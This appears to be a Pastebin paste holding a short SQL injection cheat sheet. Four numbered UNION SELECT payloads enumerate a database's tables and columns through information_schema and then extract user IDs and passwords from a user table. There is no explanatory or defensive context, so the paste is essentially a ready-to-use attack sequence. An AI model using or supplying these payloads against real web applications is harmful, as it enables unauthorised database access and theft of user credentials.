Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- b1: =-xx UNION SELECT xx-- -
- b2: UNION SELECT 1,unhex(hex(group_concat(table_name))),3 from information_schema.tables where table_schema=database()-- -
- b3: UNION SELECT 1,unhex(hex(group_concat(column_name))),3 from information_schema.columns where table_schema=database() and table_name=0xconverthex-- -
- b4: UNION SELECT 1,unhex(hex(group_concat(id,0x2f,pass))),3 from tbl_user--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement